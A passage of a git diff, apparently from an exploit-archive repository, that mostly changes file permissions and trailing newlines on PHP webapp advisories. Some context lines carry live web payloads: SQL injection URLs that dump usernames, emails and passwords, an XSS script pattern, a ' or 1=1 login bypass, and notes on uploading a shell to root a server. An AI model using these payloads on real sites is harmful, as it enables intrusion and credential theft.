b/platforms/php/webapps/1361.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1363.php b/platforms/php/webapps/1363.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1364.c b/platforms/php/webapps/1364.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1367.php b/platforms/php/webapps/1367.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1370.php b/platforms/php/webapps/1370.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1373.php b/platforms/php/webapps/1373.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13736.txt b/platforms/php/webapps/13736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13737.txt b/platforms/php/webapps/13737.txt old mode 100755 new mode 100644 index 9a40dc4c3..e31f82fef --- a/platforms/php/webapps/13737.txt +++ b/platforms/php/webapps/13737.txt @@ -49,4 +49,4 @@ administrator/components/com_djartgallery/controller.php, line 382: -by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file +by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file diff --git a/platforms/php/webapps/13738.txt b/platforms/php/webapps/13738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13739.txt b/platforms/php/webapps/13739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13740.txt b/platforms/php/webapps/13740.txt old mode 100755 new mode 100644 index 891d48001..e28c47f81 --- a/platforms/php/webapps/13740.txt +++ b/platforms/php/webapps/13740.txt @@ -61,4 +61,4 @@ Xploit: \m/ Xss \m/ ############################################################################ -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13741.txt b/platforms/php/webapps/13741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13744.txt b/platforms/php/webapps/13744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13745.txt b/platforms/php/webapps/13745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13746.txt b/platforms/php/webapps/13746.txt old mode 100755 new mode 100644 index 6c50e877f..27ad1669b --- a/platforms/php/webapps/13746.txt +++ b/platforms/php/webapps/13746.txt @@ -51,4 +51,4 @@ search=[SQLi] -by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file +by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \ No newline at end of file diff --git a/platforms/php/webapps/13747.txt b/platforms/php/webapps/13747.txt old mode 100755 new mode 100644 index 5095de807..bee555450 --- a/platforms/php/webapps/13747.txt +++ b/platforms/php/webapps/13747.txt @@ -36,4 +36,4 @@ Xploit : ############################################################################ #spl thks: exploit-db team -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13748.txt b/platforms/php/webapps/13748.txt old mode 100755 new mode 100644 index 37d071959..a7d634391 --- a/platforms/php/webapps/13748.txt +++ b/platforms/php/webapps/13748.txt @@ -54,4 +54,4 @@ submit your ad : ############################################################################ #spl thks: exploit-db team -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13749.txt b/platforms/php/webapps/13749.txt old mode 100755 new mode 100644 index 12d002ef0..bcb33cafc --- a/platforms/php/webapps/13749.txt +++ b/platforms/php/webapps/13749.txt @@ -37,4 +37,4 @@ Demo : http://server/textads_2/index.php?page=[sqli] ############################################################################ #spl thks: exploit-db.com -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13750.txt b/platforms/php/webapps/13750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13751.txt b/platforms/php/webapps/13751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13752.txt b/platforms/php/webapps/13752.txt old mode 100755 new mode 100644 index bd602b499..b22d70d43 --- a/platforms/php/webapps/13752.txt +++ b/platforms/php/webapps/13752.txt @@ -44,4 +44,4 @@ Xploit : xss vulnerability ############################################################################ #spl thks: exploit-db.com -#Sid3^effects \ No newline at end of file +#Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13762.txt b/platforms/php/webapps/13762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13766.txt b/platforms/php/webapps/13766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13769.txt b/platforms/php/webapps/13769.txt old mode 100755 new mode 100644 index 6944d59a5..8b26d1a26 --- a/platforms/php/webapps/13769.txt +++ b/platforms/php/webapps/13769.txt @@ -52,4 +52,4 @@ Xploit: SQLI DEMO :http://server/restaurant-site-cms-script-demo/dish.php?id=[sqli] ############################################################################################################### -#Sid#^effects \ No newline at end of file +#Sid#^effects \ No newline at end of file diff --git a/platforms/php/webapps/13770.txt b/platforms/php/webapps/13770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13771.txt b/platforms/php/webapps/13771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13772.txt b/platforms/php/webapps/13772.txt old mode 100755 new mode 100644 index c53d5cbc3..84a5a3270 --- a/platforms/php/webapps/13772.txt +++ b/platforms/php/webapps/13772.txt @@ -54,4 +54,4 @@ STEP 5 : now r00t the box ############################################################################################################### # 0day no more -#Sid#^effects \ No newline at end of file +#Sid#^effects \ No newline at end of file diff --git a/platforms/php/webapps/13773.txt b/platforms/php/webapps/13773.txt old mode 100755 new mode 100644 index e2e4fad13..cba40a9a7 --- a/platforms/php/webapps/13773.txt +++ b/platforms/php/webapps/13773.txt @@ -53,4 +53,4 @@ DEMO URL : http://server/user/uploads/small_thumbs/testphpjpeg.php.txt.txt.txt STEP 5 : And there your are :) ############################################################################################################### -#Sid#^effects \ No newline at end of file +#Sid#^effects \ No newline at end of file diff --git a/platforms/php/webapps/13776.txt b/platforms/php/webapps/13776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13777.txt b/platforms/php/webapps/13777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13778.txt b/platforms/php/webapps/13778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13779.txt b/platforms/php/webapps/13779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13781.txt b/platforms/php/webapps/13781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13782.txt b/platforms/php/webapps/13782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13783.txt b/platforms/php/webapps/13783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13784.txt b/platforms/php/webapps/13784.txt old mode 100755 new mode 100644 index fe94e4c4a..fbe5b553e --- a/platforms/php/webapps/13784.txt +++ b/platforms/php/webapps/13784.txt @@ -48,4 +48,4 @@ Example :http://[site]/index.php?c_action=listings&state=%272 ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13785.txt b/platforms/php/webapps/13785.txt old mode 100755 new mode 100644 index 997f13126..e358079ec --- a/platforms/php/webapps/13785.txt +++ b/platforms/php/webapps/13785.txt @@ -61,4 +61,4 @@ Xploit: XSS Vulnerability ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13786.txt b/platforms/php/webapps/13786.txt old mode 100755 new mode 100644 index ce59c53b9..291cc2d48 --- a/platforms/php/webapps/13786.txt +++ b/platforms/php/webapps/13786.txt @@ -62,4 +62,4 @@ Xploit: XSS Vulnerability ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/1379.php b/platforms/php/webapps/1379.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13792.txt b/platforms/php/webapps/13792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13796.txt b/platforms/php/webapps/13796.txt old mode 100755 new mode 100644 index 6f3a86d17..c9d547683 --- a/platforms/php/webapps/13796.txt +++ b/platforms/php/webapps/13796.txt @@ -51,4 +51,4 @@ DEMO : ######## # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13797.txt b/platforms/php/webapps/13797.txt old mode 100755 new mode 100644 index 349e04915..78a16f12f --- a/platforms/php/webapps/13797.txt +++ b/platforms/php/webapps/13797.txt @@ -51,4 +51,4 @@ DEMO URL : ######## # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13798.txt b/platforms/php/webapps/13798.txt old mode 100755 new mode 100644 index c14107acf..8fbc58a5a --- a/platforms/php/webapps/13798.txt +++ b/platforms/php/webapps/13798.txt @@ -45,4 +45,4 @@ DEMO URL : ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13799.txt b/platforms/php/webapps/13799.txt old mode 100755 new mode 100644 index 8a1b74d3c..56b380813 --- a/platforms/php/webapps/13799.txt +++ b/platforms/php/webapps/13799.txt @@ -45,4 +45,4 @@ DEMO URL : ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13800.txt b/platforms/php/webapps/13800.txt old mode 100755 new mode 100644 index e53e82991..829522c1f --- a/platforms/php/webapps/13800.txt +++ b/platforms/php/webapps/13800.txt @@ -44,4 +44,4 @@ DEMO URL : ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13801.txt b/platforms/php/webapps/13801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13802.txt b/platforms/php/webapps/13802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13803.txt b/platforms/php/webapps/13803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13804.txt b/platforms/php/webapps/13804.txt old mode 100755 new mode 100644 index bab89252b..a2bec8bb7 --- a/platforms/php/webapps/13804.txt +++ b/platforms/php/webapps/13804.txt @@ -45,4 +45,4 @@ DEMO URL : ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13805.txt b/platforms/php/webapps/13805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13810.php b/platforms/php/webapps/13810.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13812.txt b/platforms/php/webapps/13812.txt old mode 100755 new mode 100644 index 80a2f838f..0ed912acc --- a/platforms/php/webapps/13812.txt +++ b/platforms/php/webapps/13812.txt @@ -62,4 +62,4 @@ Xploit: XSS Vulnerability ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13813.html b/platforms/php/webapps/13813.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13816.txt b/platforms/php/webapps/13816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13819.txt b/platforms/php/webapps/13819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13826.txt b/platforms/php/webapps/13826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13827.txt b/platforms/php/webapps/13827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13829.txt b/platforms/php/webapps/13829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1383.txt b/platforms/php/webapps/1383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13830.txt b/platforms/php/webapps/13830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13831.txt b/platforms/php/webapps/13831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13832.txt b/platforms/php/webapps/13832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13833.txt b/platforms/php/webapps/13833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13835.txt b/platforms/php/webapps/13835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13845.txt b/platforms/php/webapps/13845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13847.txt b/platforms/php/webapps/13847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13848.txt b/platforms/php/webapps/13848.txt old mode 100755 new mode 100644 index 83b615dd0..a3cbd332c --- a/platforms/php/webapps/13848.txt +++ b/platforms/php/webapps/13848.txt @@ -15,4 +15,4 @@ After , you can login here : http://target/path/login.php demo : http://server/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login-- -GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members \ No newline at end of file +GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members \ No newline at end of file diff --git a/platforms/php/webapps/13849.txt b/platforms/php/webapps/13849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13852.txt b/platforms/php/webapps/13852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13854.txt b/platforms/php/webapps/13854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13855.txt b/platforms/php/webapps/13855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13856.txt b/platforms/php/webapps/13856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13857.txt b/platforms/php/webapps/13857.txt old mode 100755 new mode 100644 index a9db40ffb..d271d02f9 --- a/platforms/php/webapps/13857.txt +++ b/platforms/php/webapps/13857.txt @@ -16,4 +16,4 @@ SQL Injection: http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin-- -################################################################################################## \ No newline at end of file +################################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/13858.txt b/platforms/php/webapps/13858.txt old mode 100755 new mode 100644 index 458d2209e..87ad250fe --- a/platforms/php/webapps/13858.txt +++ b/platforms/php/webapps/13858.txt @@ -18,4 +18,4 @@ http://localhost/[path]/game.php?id=-1+union+select+1,2,3,password,5,6,7,8,9,10, ################################################################################################## For Palestine........... -################################################################################################## \ No newline at end of file +################################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/13862.txt b/platforms/php/webapps/13862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13863.txt b/platforms/php/webapps/13863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13864.txt b/platforms/php/webapps/13864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13865.txt b/platforms/php/webapps/13865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13866.txt b/platforms/php/webapps/13866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13867.txt b/platforms/php/webapps/13867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1387.php b/platforms/php/webapps/1387.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13881.txt b/platforms/php/webapps/13881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13889.txt b/platforms/php/webapps/13889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13890.txt b/platforms/php/webapps/13890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13892.txt b/platforms/php/webapps/13892.txt old mode 100755 new mode 100644 index d93740261..7fe867d2a --- a/platforms/php/webapps/13892.txt +++ b/platforms/php/webapps/13892.txt @@ -30,4 +30,4 @@ Xploit:Upload Vulnerability ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13893.txt b/platforms/php/webapps/13893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13894.txt b/platforms/php/webapps/13894.txt old mode 100755 new mode 100644 index 4a03667cd..3227e2b0a --- a/platforms/php/webapps/13894.txt +++ b/platforms/php/webapps/13894.txt @@ -20,4 +20,4 @@ Attack Pattern: '"--><script>alert(0x000872)</script> DEMO URL :http://[site]/products/classified/headersearch.php?sid=[XSS] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13897.txt b/platforms/php/webapps/13897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13899.txt b/platforms/php/webapps/13899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13900.txt b/platforms/php/webapps/13900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13901.txt b/platforms/php/webapps/13901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13904.txt b/platforms/php/webapps/13904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13911.txt b/platforms/php/webapps/13911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13912.txt b/platforms/php/webapps/13912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13916.txt b/platforms/php/webapps/13916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13922.txt b/platforms/php/webapps/13922.txt old mode 100755 new mode 100644 index b5a5a7977..90e3f5958 --- a/platforms/php/webapps/13922.txt +++ b/platforms/php/webapps/13922.txt @@ -43,4 +43,4 @@ DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-G ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13923.txt b/platforms/php/webapps/13923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13925.txt b/platforms/php/webapps/13925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13926.txt b/platforms/php/webapps/13926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13927.txt b/platforms/php/webapps/13927.txt old mode 100755 new mode 100644 index 347f417d3..3916392c5 --- a/platforms/php/webapps/13927.txt +++ b/platforms/php/webapps/13927.txt @@ -29,4 +29,4 @@ MarketSaz remote file Upload Vulnerability #OR #http://server/shell.php -# Spical Thanks To Net.Edit0r (Net.Edit0r@att.net) \ No newline at end of file +# Spical Thanks To Net.Edit0r (Net.Edit0r@att.net) \ No newline at end of file diff --git a/platforms/php/webapps/13929.txt b/platforms/php/webapps/13929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13930.txt b/platforms/php/webapps/13930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13931.txt b/platforms/php/webapps/13931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13933.txt b/platforms/php/webapps/13933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13935.txt b/platforms/php/webapps/13935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13936.txt b/platforms/php/webapps/13936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13937.txt b/platforms/php/webapps/13937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13938.html b/platforms/php/webapps/13938.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13944.txt b/platforms/php/webapps/13944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13945.txt b/platforms/php/webapps/13945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13946.txt b/platforms/php/webapps/13946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13947.txt b/platforms/php/webapps/13947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13948.txt b/platforms/php/webapps/13948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13949.txt b/platforms/php/webapps/13949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1395.php b/platforms/php/webapps/1395.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13951.txt b/platforms/php/webapps/13951.txt old mode 100755 new mode 100644 index 26cc2c98b..319069a6e --- a/platforms/php/webapps/13951.txt +++ b/platforms/php/webapps/13951.txt @@ -38,4 +38,4 @@ DEMO URL : http://server/index.php?option=com_eportfolio&Itemid=18&task=personal STEP 4: Now you can check your shell n root the server :P ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13952.txt b/platforms/php/webapps/13952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13954.txt b/platforms/php/webapps/13954.txt old mode 100755 new mode 100644 index 00cb91e5e..3284e54bd --- a/platforms/php/webapps/13954.txt +++ b/platforms/php/webapps/13954.txt @@ -22,4 +22,4 @@ DEMO URL http://server/?lang=[inject code] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13955.txt b/platforms/php/webapps/13955.txt old mode 100755 new mode 100644 index e97de5dbd..35bf86eaa --- a/platforms/php/webapps/13955.txt +++ b/platforms/php/webapps/13955.txt @@ -26,4 +26,4 @@ DEMO URL : http://server/index.php?option=com_community&view=profile&Itemid=66 ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13956.txt b/platforms/php/webapps/13956.txt old mode 100755 new mode 100644 index cd0fd1e6c..759a79a3d --- a/platforms/php/webapps/13956.txt +++ b/platforms/php/webapps/13956.txt @@ -20,4 +20,4 @@ DEMO URL ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/13957.txt b/platforms/php/webapps/13957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13960.html b/platforms/php/webapps/13960.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13961.txt b/platforms/php/webapps/13961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13962.txt b/platforms/php/webapps/13962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13964.txt b/platforms/php/webapps/13964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13966.txt b/platforms/php/webapps/13966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13967.txt b/platforms/php/webapps/13967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13969.txt b/platforms/php/webapps/13969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13970.txt b/platforms/php/webapps/13970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13971.txt b/platforms/php/webapps/13971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13973.txt b/platforms/php/webapps/13973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13975.txt b/platforms/php/webapps/13975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13976.txt b/platforms/php/webapps/13976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13977.txt b/platforms/php/webapps/13977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13978.txt b/platforms/php/webapps/13978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13979.txt b/platforms/php/webapps/13979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13980.txt b/platforms/php/webapps/13980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13981.txt b/platforms/php/webapps/13981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13982.txt b/platforms/php/webapps/13982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13983.txt b/platforms/php/webapps/13983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13986.txt b/platforms/php/webapps/13986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13987.txt b/platforms/php/webapps/13987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13988.txt b/platforms/php/webapps/13988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13991.txt b/platforms/php/webapps/13991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13992.txt b/platforms/php/webapps/13992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13993.txt b/platforms/php/webapps/13993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13996.txt b/platforms/php/webapps/13996.txt old mode 100755 new mode 100644 index d7c9a224b..60f77b778 --- a/platforms/php/webapps/13996.txt +++ b/platforms/php/webapps/13996.txt @@ -16,4 +16,4 @@ Sql Injection: http://localhost/[path]/products.php?sid=1 (SQL) -################################################################################################## \ No newline at end of file +################################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/13997.txt b/platforms/php/webapps/13997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/13999.html b/platforms/php/webapps/13999.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14000.txt b/platforms/php/webapps/14000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14005.txt b/platforms/php/webapps/14005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14007.txt b/platforms/php/webapps/14007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14008.txt b/platforms/php/webapps/14008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14009.txt b/platforms/php/webapps/14009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14011.txt b/platforms/php/webapps/14011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14015.txt b/platforms/php/webapps/14015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14016.txt b/platforms/php/webapps/14016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14017.txt b/platforms/php/webapps/14017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14018.txt b/platforms/php/webapps/14018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14019.txt b/platforms/php/webapps/14019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14020.txt b/platforms/php/webapps/14020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14025.txt b/platforms/php/webapps/14025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14026.txt b/platforms/php/webapps/14026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14027.txt b/platforms/php/webapps/14027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14028.txt b/platforms/php/webapps/14028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14033.txt b/platforms/php/webapps/14033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14035.txt b/platforms/php/webapps/14035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14047.txt b/platforms/php/webapps/14047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14048.txt b/platforms/php/webapps/14048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14049.html b/platforms/php/webapps/14049.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14050.txt b/platforms/php/webapps/14050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14051.txt b/platforms/php/webapps/14051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14053.txt b/platforms/php/webapps/14053.txt old mode 100755 new mode 100644 index 66fe75bc5..6896ff855 --- a/platforms/php/webapps/14053.txt +++ b/platforms/php/webapps/14053.txt @@ -30,4 +30,4 @@ http://www.example.com/snipe/image.php?page=1&search_type=and?_id=78(SQLI) ---------greatz---------- Greatz to all my frinds and the all muslims and Volc4n0 and Golden Ice and mr.ip -and the all \ No newline at end of file +and the all \ No newline at end of file diff --git a/platforms/php/webapps/14054.txt b/platforms/php/webapps/14054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14055.txt b/platforms/php/webapps/14055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14056.txt b/platforms/php/webapps/14056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14057.txt b/platforms/php/webapps/14057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14059.txt b/platforms/php/webapps/14059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14060.txt b/platforms/php/webapps/14060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14062.txt b/platforms/php/webapps/14062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14063.txt b/platforms/php/webapps/14063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14064.txt b/platforms/php/webapps/14064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14070.txt b/platforms/php/webapps/14070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14073.txt b/platforms/php/webapps/14073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14078.txt b/platforms/php/webapps/14078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14079.txt b/platforms/php/webapps/14079.txt old mode 100755 new mode 100644 index 6cffdda9d..0b1fc28a2 --- a/platforms/php/webapps/14079.txt +++ b/platforms/php/webapps/14079.txt @@ -23,4 +23,4 @@ DEMO URL : http://server/jobsearchengine/show_search_result.php?keyword=[sqli] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14080.txt b/platforms/php/webapps/14080.txt old mode 100755 new mode 100644 index f98d6c414..7da78318d --- a/platforms/php/webapps/14080.txt +++ b/platforms/php/webapps/14080.txt @@ -23,4 +23,4 @@ by using ' or 1=1 or ''=' in both username and password the attacker can get the ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No 